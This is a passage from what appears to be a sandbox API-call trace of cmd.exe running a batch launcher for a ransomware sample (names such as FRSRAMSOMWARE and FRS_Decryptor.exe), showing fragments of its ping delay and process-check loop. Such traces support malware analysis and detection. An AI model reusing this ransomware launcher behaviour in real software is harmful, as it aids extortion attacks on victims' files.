lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8eb6c*=0xb9, lpOverlapped=0x0) returned 1 [0067.967] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0067.967] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\n") returned 2 [0067.967] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0067.967] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0067.967] GetFileType (hFile=0x2a0) returned 0x1 [0067.967] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0067.967] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8eb6c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8eb6c*=0xb7, lpOverlapped=0x0) returned 1 [0067.967] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0067.967] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n") returned 4 [0067.967] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0067.968] _get_osfhandle (_FileHandle=1) returned 0x28 [0067.968] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0067.968] _get_osfhandle (_FileHandle=0) returned 0x24 [0067.968] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0067.968] SetConsoleInputExeNameW () returned 0x1 [0067.968] GetConsoleOutputCP () returned 0x1b5 [0067.968] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0067.968] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.968] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0067.968] _open_osfhandle (_OSFileHandle=0x2a0, _Flags=8) returned 3 [0067.968] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0067.968] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0067.968] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0067.968] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0067.969] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0067.969] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\necryptor.exe\r\n\r\n.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0067.969] GetFileType (hFile=0x2a0) returned 0x1 [0067.969] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0067.969] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0067.969] _tell (_FileHandle=3) returned 2512 [0067.969] _close (_FileHandle=3) returned 0 [0067.969] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0067.969] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0067.969] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0067.969] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0067.969] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0067.969] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0067.969] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0067.969] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0067.969] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0067.969] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0067.969] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0067.969] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0067.969] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0067.969] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0067.969] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0067.969] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0067.969] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0067.969] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0067.969] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0067.969] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0067.969] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0067.969] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0067.969] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0067.969] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0067.969] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0067.969] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0067.969] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0067.969] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0067.969] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0067.969] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0067.969] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0067.970] _wcsicmp (_String1="ping", _String2="START") returned -3 [0067.970] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0067.970] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0067.970] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0067.970] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0067.970] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0067.970] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0067.970] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0067.970] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0067.970] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0067.970] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0067.970] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0067.970] SetErrorMode (uMode=0x0) returned 0x0 [0067.970] SetErrorMode (uMode=0x1) returned 0x0 [0067.970] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0067.970] SetErrorMode (uMode=0x0) returned 0x1 [0067.970] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0067.970] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0067.970] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0067.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0067.970] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0067.970] GetLastError () returned 0x2 [0067.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0067.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ab0 [0067.970] FindClose (in: hFindFile=0xd59ab0 | out: hFindFile=0xd59ab0) returned 1 [0067.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0067.971] GetLastError () returned 0x2 [0067.971] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0067.971] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0067.971] GetFileType (hFile=0x28) returned 0x2 [0067.971] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0067.971] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8efb4 | out: lpMode=0xc8efb4) returned 1 [0067.971] _dup (_FileHandle=1) returned 3 [0067.971] _close (_FileHandle=1) returned 0 [0067.971] _wcsicmp (_String1="nul", _String2="con") returned 11 [0067.971] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0067.971] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0067.971] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0067.971] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0067.971] SetErrorMode (uMode=0x0) returned 0x0 [0067.971] SetErrorMode (uMode=0x1) returned 0x0 [0067.971] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0067.972] SetErrorMode (uMode=0x0) returned 0x1 [0067.972] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0067.972] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0067.972] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0067.972] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0067.972] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0067.972] GetLastError () returned 0x2 [0067.972] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0067.972] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59af0 [0067.972] FindClose (in: hFindFile=0xd59af0 | out: hFindFile=0xd59af0) returned 1 [0067.972] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0067.972] GetLastError () returned 0x2 [0067.972] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0067.972] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0067.972] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0067.988] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0067.988] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0067.988] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0067.988] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0067.989] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0067.989] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0067.989] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0067.989] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0067.989] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0067.989] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0067.989] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0067.989] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0067.989] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0067.989] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0067.989] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0067.989] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0067.990] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0067.990] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0067.990] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x260, hThread=0x2f0, dwProcessId=0x968, dwThreadId=0x12c)) returned 1 [0067.993] CloseHandle (hObject=0x2f0) returned 1 [0067.993] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0067.993] GetEnvironmentStringsW () returned 0xd2c668* [0067.993] FreeEnvironmentStringsA (penv="=") returned 1 [0067.993] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0xffffffff) returned 0x0 [0070.449] GetExitCodeProcess (in: hProcess=0x260, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0070.450] CloseHandle (hObject=0x260) returned 1 [0070.450] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0070.450] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0070.450] GetEnvironmentStringsW () returned 0xd30508* [0070.450] FreeEnvironmentStringsA (penv="=") returned 1 [0070.450] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0070.450] GetEnvironmentStringsW () returned 0xd2c668* [0070.450] FreeEnvironmentStringsA (penv="=") returned 1 [0070.450] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0070.450] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0070.450] _close (_FileHandle=3) returned 0 [0070.450] _get_osfhandle (_FileHandle=1) returned 0x28 [0070.450] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0070.451] _get_osfhandle (_FileHandle=1) returned 0x28 [0070.451] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0070.451] _get_osfhandle (_FileHandle=0) returned 0x24 [0070.451] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0070.451] SetConsoleInputExeNameW () returned 0x1 [0070.451] GetConsoleOutputCP () returned 0x1b5 [0070.451] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0070.451] SetThreadUILanguage (LangId=0x0) returned 0x409 [0070.451] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0070.452] _open_osfhandle (_OSFileHandle=0x2a0, _Flags=8) returned 3 [0070.452] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0070.452] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0070.452] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0070.452] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0070.452] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0070.452] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0070.452] GetFileType (hFile=0x2a0) returned 0x1 [0070.452] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0070.452] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0070.452] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0070.452] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0070.452] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0070.452] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0070.452] GetFileType (hFile=0x2a0) returned 0x1 [0070.452] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0070.452] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0070.452] _tell (_FileHandle=3) returned 2627 [0070.452] _close (_FileHandle=3) returned 0 [0070.452] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0070.452] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0070.452] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0070.452] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0070.452] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0070.457] feof (_File=0x76ea4c68) returned 0 [0070.457] ferror (_File=0x76ea4c68) returned 0 [0070.457] fgets (in: _Buf=0xd82600, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0073.162] feof (_File=0x76ea4c68) returned 0 [0073.162] ferror (_File=0x76ea4c68) returned 0 [0073.162] fgets (in: _Buf=0xd85afe, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0073.200] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0073.201] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43726, cbMultiByte=78, lpWideCharStr=0xd436d8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0073.201] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0073.201] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0073.201] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x254 [0073.201] _open_osfhandle (_OSFileHandle=0x254, _Flags=8) returned 3 [0073.201] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.201] SetFilePointer (in: hFile=0x254, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0073.201] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.202] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0073.202] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0073.202] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.202] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0073.202] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.202] GetFileType (hFile=0x254) returned 0x1 [0073.202] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0073.202] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, 